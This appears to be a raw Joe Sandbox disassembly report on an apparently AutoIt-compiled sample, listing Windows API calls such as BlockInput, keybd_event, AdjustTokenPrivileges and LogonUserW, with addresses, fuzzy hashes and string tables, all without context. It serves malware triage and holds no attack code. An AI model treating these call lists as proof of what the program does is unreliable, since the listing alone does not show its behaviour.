                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InputSendkeybd_event
                                                                        • String ID:
                                                                        • API String ID: 3536248340-0
                                                                        • Opcode ID: e162aa69f9a7556dc01f051cf78713494dee447f01ce4310dd75739ec1b055da
                                                                        • Instruction ID: c96582013032267e3bc4e14ca066bbc191b157747fed8d0235b37d51407d9c21
                                                                        • Opcode Fuzzy Hash: e162aa69f9a7556dc01f051cf78713494dee447f01ce4310dd75739ec1b055da
                                                                        • Instruction Fuzzy Hash: A4F0497190024DABDB10CF94C805BFE7BB4FF08315F00815AF999AA292D37A9615DF94
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,01059B52,?,0107098C,?), ref: 0104A6DA
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,01059B52,?,0107098C,?), ref: 0104A6EC
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: fe75a923bd8f6b5177f0887afaff9dbe71b17d2a5e271522dc88778b33837983
                                                                        • Instruction ID: c45d39e17c5d5fa27a4209e102c794046a9f3d0e64d419fa57bdf5b5e6e83607
                                                                        • Opcode Fuzzy Hash: fe75a923bd8f6b5177f0887afaff9dbe71b17d2a5e271522dc88778b33837983
                                                                        • Instruction Fuzzy Hash: 9FF0823954422EFBDB21AEA4CC88FEA77ACBF09361F008265B949A7185D6759540CBA0
                                                                        APIs
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01038F27), ref: 01038DFE
                                                                        • CloseHandle.KERNEL32(?,?,01038F27), ref: 01038E10
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: e2c4b454bfdef00c4e274c4787b945677d14f9d673e4cc332349cf835cb859a8
                                                                        • Instruction ID: fcd0fccd7a4cc2f83ddc6c201f8eca38030a624d03b0d0149e48ddc655f296e0
                                                                        • Opcode Fuzzy Hash: e2c4b454bfdef00c4e274c4787b945677d14f9d673e4cc332349cf835cb859a8
                                                                        • Instruction Fuzzy Hash: 16E04F71000601EFF7322B60EC08DB37BADEB00310B10891DF4D5804B4C7729C90DB50
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01008F87,?,?,?,00000001), ref: 0100A38A
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0100A393
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: ae837576b173107a9b43ee38f0b717633c721c25d2e7551e59d504237f930f55
                                                                        • Instruction ID: c7acc17adc0ed33ac9b8587b35a915339b855c3b13184a8e12e3c628e5facf2a
                                                                        • Opcode Fuzzy Hash: ae837576b173107a9b43ee38f0b717633c721c25d2e7551e59d504237f930f55
                                                                        • Instruction Fuzzy Hash: 68B09231474208ABCA502B91E809B8A3F6CEB46A6AF008110F64D54058CBA764508B91
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 010545F0
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: ea17065f1bbb2139bb61ea9581f79883e57a62356d73a9d1728ed880802c03b9
                                                                        • Instruction ID: 37ddc051aeea3b900d1481b44b6b5e56be80704d0d4cecb5ce2dec3b42599712
                                                                        • Opcode Fuzzy Hash: ea17065f1bbb2139bb61ea9581f79883e57a62356d73a9d1728ed880802c03b9
                                                                        • Instruction Fuzzy Hash: ADE0D8353001055FC750EF5AD800A8BF7DCAF84760F008015FC45D7302DA74F9418B91
                                                                        APIs
                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01045205
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: 69fc0dd539ab763b7edf1225f77387fafcffc01954f7e796062a4ac7d8f0ac0f
                                                                        • Instruction ID: 4f3bb660d6f96391a574775d88f6d3b7fe8338b67f33533a8c407732ffbefa99
                                                                        • Opcode Fuzzy Hash: 69fc0dd539ab763b7edf1225f77387fafcffc01954f7e796062a4ac7d8f0ac0f
                                                                        • Instruction Fuzzy Hash: 9AD092E616060A7BFDA807289E9FF7A1A88E3016C1F8446A9B2C2990E1ECD568859531
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,01038FA7), ref: 01039389
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 0c0c820147f45c8a19a49aaf53d6942c66423951a7506b71853b77c1a53ba4a0
                                                                        • Instruction ID: 77ee0e29caa5438719b0af0a59aed2089a0a35abda9c6073998aeb4550451866
                                                                        • Opcode Fuzzy Hash: 0c0c820147f45c8a19a49aaf53d6942c66423951a7506b71853b77c1a53ba4a0
                                                                        • Instruction Fuzzy Hash: 81D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15D5090C776D835AF60
                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 01020734
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: cb9810eece71e0257b4d4b4e502125e860b623ad49a552ee93366595f9fced1c
                                                                        • Instruction ID: 5913a1def075ca4520a8cc46f0cfe00ad07034e2482d0dfc3b8f8f3c1770ed5e
                                                                        • Opcode Fuzzy Hash: cb9810eece71e0257b4d4b4e502125e860b623ad49a552ee93366595f9fced1c
                                                                        • Instruction Fuzzy Hash: D5C04CF180011DDBDB15DBA0D588DEE77BCAB04314F100555F145B2104D778AB448B71
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0100A35A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 703a7b80440a02ecd022dc23fbda32319b7aa7f2f87f3d0bf17326017a45c001
                                                                        • Instruction ID: ca0accb64d53d47514f96f289d155d59293c7a9bad5dca2cbe16e94eb603edde
                                                                        • Opcode Fuzzy Hash: 703a7b80440a02ecd022dc23fbda32319b7aa7f2f87f3d0bf17326017a45c001
                                                                        • Instruction Fuzzy Hash: 0DA0123002010CA78A001A41E8044457F5CD6011547008010F40C00015877364104A80
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,01070980), ref: 01063C65
                                                                        • IsWindowVisible.USER32(?), ref: 01063C89
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 4105515805-45149045
                                                                        • Opcode ID: 458b61eeee9cf0be61bee82c1fd07a0a551edcd60e676460c3b97f53cb284847
                                                                        • Instruction ID: ba5c888de27c0ae12cdd1dd09e7aa6bdc8b4d91c0fce2b4fe60cd64e4be21cae
                                                                        • Opcode Fuzzy Hash: 458b61eeee9cf0be61bee82c1fd07a0a551edcd60e676460c3b97f53cb284847
                                                                        • Instruction Fuzzy Hash: 58D19330204215DBEB14EF14C950AAEBBE9FFA4354F104459F9CA5B2E6CB35ED0ACB91
                                                                        APIs
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0106AC55
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0106AC86
                                                                        • GetSysColor.USER32(0000000F), ref: 0106AC92
                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0106ACAC
                                                                        • SelectObject.GDI32(?,?), ref: 0106ACBB
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0106ACE6
                                                                        • GetSysColor.USER32(00000010), ref: 0106ACEE
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0106ACF5
                                                                        • FrameRect.USER32(?,?,00000000), ref: 0106AD04
                                                                        • DeleteObject.GDI32(00000000), ref: 0106AD0B
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0106AD56
                                                                        • FillRect.USER32(?,?,?), ref: 0106AD88
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0106ADB3
                                                                          • Part of subcall function 0106AF18: GetSysColor.USER32(00000012), ref: 0106AF51
                                                                          • Part of subcall function 0106AF18: SetTextColor.GDI32(?,?), ref: 0106AF55
                                                                          • Part of subcall function 0106AF18: GetSysColorBrush.USER32(0000000F), ref: 0106AF6B
                                                                          • Part of subcall function 0106AF18: GetSysColor.USER32(0000000F), ref: 0106AF76
                                                                          • Part of subcall function 0106AF18: GetSysColor.USER32(00000011), ref: 0106AF93
                                                                          • Part of subcall function 0106AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0106AFA1
                                                                          • Part of subcall function 0106AF18: SelectObject.GDI32(?,00000000), ref: 0106AFB2
                                                                          • Part of subcall function 0106AF18: SetBkColor.GDI32(?,00000000), ref: 0106AFBB
                                                                          • Part of subcall function 0106AF18: SelectObject.GDI32(?,?), ref: 0106AFC8
                                                                          • Part of subcall function 0106AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0106AFE7
                                                                          • Part of subcall function 0106AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0106AFFE
                                                                          • Part of subcall function 0106AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0106B013
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                        • String ID:
                                                                        • API String ID: 4124339563-0
                                                                        • Opcode ID: 3ad61e69568444e15d0f5a6e4b5f9ea1f0ce50819ce1dc0777228b2bf0dbf97d
                                                                        • Instruction ID: 0c72c637dec407a9fcc601d97525be5dfbda8ee85134373d86b66a02d715368a
                                                                        • Opcode Fuzzy Hash: 3ad61e69568444e15d0f5a6e4b5f9ea1f0ce50819ce1dc0777228b2bf0dbf97d
                                                                        • Instruction Fuzzy Hash: 98A18D72908301EFD761AF64DC08A6BBBE9FF89321F100B19F5A2A61D9C736D940CB51
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?), ref: 00FE3072
                                                                        • DeleteObject.GDI32(00000000), ref: 00FE30B8
                                                                        • DeleteObject.GDI32(00000000), ref: 00FE30C3
                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00FE30CE
                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00FE30D9
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0101C77C
                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0101C7B5
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0101CBDE
                                                                          • Part of subcall function 00FE1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE2412,?,00000000,?,?,?,?,00FE1AA7,00000000,?), ref: 00FE1F76
                                                                        • SendMessageW.USER32(?,00001053), ref: 0101CC1B
                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0101CC32
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0101CC48
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0101CC53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                        • String ID: 0
                                                                        • API String ID: 464785882-4108050209
                                                                        • Opcode ID: af8970353d04fbd5f4e254eb336f6ffa7e93712fdf89398b2aa61c105c575c6b
                                                                        • Instruction ID: 35adee98e2c19c67bac4d8f639b1e9274c424294554d0ac4dc99dcb438af5f37
                                                                        • Opcode Fuzzy Hash: af8970353d04fbd5f4e254eb336f6ffa7e93712fdf89398b2aa61c105c575c6b
                                                                        • Instruction Fuzzy Hash: 92122630640241EFEB61DF28C988BA9BBE1FF04314F1446A9FAC5DB25AC735E941DB91
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 2660009612-1645009161
                                                                        • Opcode ID: 9edb498b231199d96abe2b1acf7efe942787d6919f15df255d53ca4a7f41df31
                                                                        • Instruction ID: 79e6b64e0e2618911690fe2405e23472b1696a90d6cf0b8c9d8945e30824ef70
                                                                        • Opcode Fuzzy Hash: 9edb498b231199d96abe2b1acf7efe942787d6919f15df255d53ca4a7f41df31
                                                                        • Instruction Fuzzy Hash: E3A1C531A0020EAFDB21AF61DD82FBE3775BF54780F144069FA85AB2A1DB719E01E750
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000), ref: 01057BC8
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 01057C87
                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 01057CC5
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01057CD7
                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01057D1D
                                                                        • GetClientRect.USER32(00000000,?), ref: 01057D29
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01057D6D
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01057D7C
                                                                        • GetStockObject.GDI32(00000011), ref: 01057D8C
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 01057D90
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 01057DA0
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01057DA9
                                                                        • DeleteDC.GDI32(00000000), ref: 01057DB2
                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01057DDE
                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 01057DF5
                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01057E30
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01057E44
                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 01057E55
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01057E85
                                                                        • GetStockObject.GDI32(00000011), ref: 01057E90
                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01057E9B
                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 01057EA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 0ecaa0ce5efeb5bf52f4f5ea4ad76033f25c5d90ff03901b4bd305c05b8dc59f
                                                                        • Instruction ID: 5ac9488812db8869865daa8c261a1c36c4e7bb278432f4d4491847fec5e361ec
                                                                        • Opcode Fuzzy Hash: 0ecaa0ce5efeb5bf52f4f5ea4ad76033f25c5d90ff03901b4bd305c05b8dc59f
                                                                        • Instruction Fuzzy Hash: 59A18271A00619BFEB24DBA4DC4AFAF7BB9EB45710F048214FA54A72D4C775AD00CB60
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0104B361
                                                                        • GetDriveTypeW.KERNEL32(?,01072C4C,?,\\.\,01070980), ref: 0104B43E
                                                                        • SetErrorMode.KERNEL32(00000000,01072C4C,?,\\.\,01070980), ref: 0104B59C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: 29bef562cc0409c9d2b33a301d016f74982b50abb54804a3405d645c2f46930a
                                                                        • Instruction ID: a0e131220d5960c46fa7206c79797d82e084c5a78f891718ec02c211d02b29e8
                                                                        • Opcode Fuzzy Hash: 29bef562cc0409c9d2b33a301d016f74982b50abb54804a3405d645c2f46930a
                                                                        • Instruction Fuzzy Hash: 9F51E5B0B40209EB8B10EB75D9D1EBDFBE0BB44710B188179E5C6AB250DE75EA41DB81
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0106A0F7
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0106A1B0
                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0106A1CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
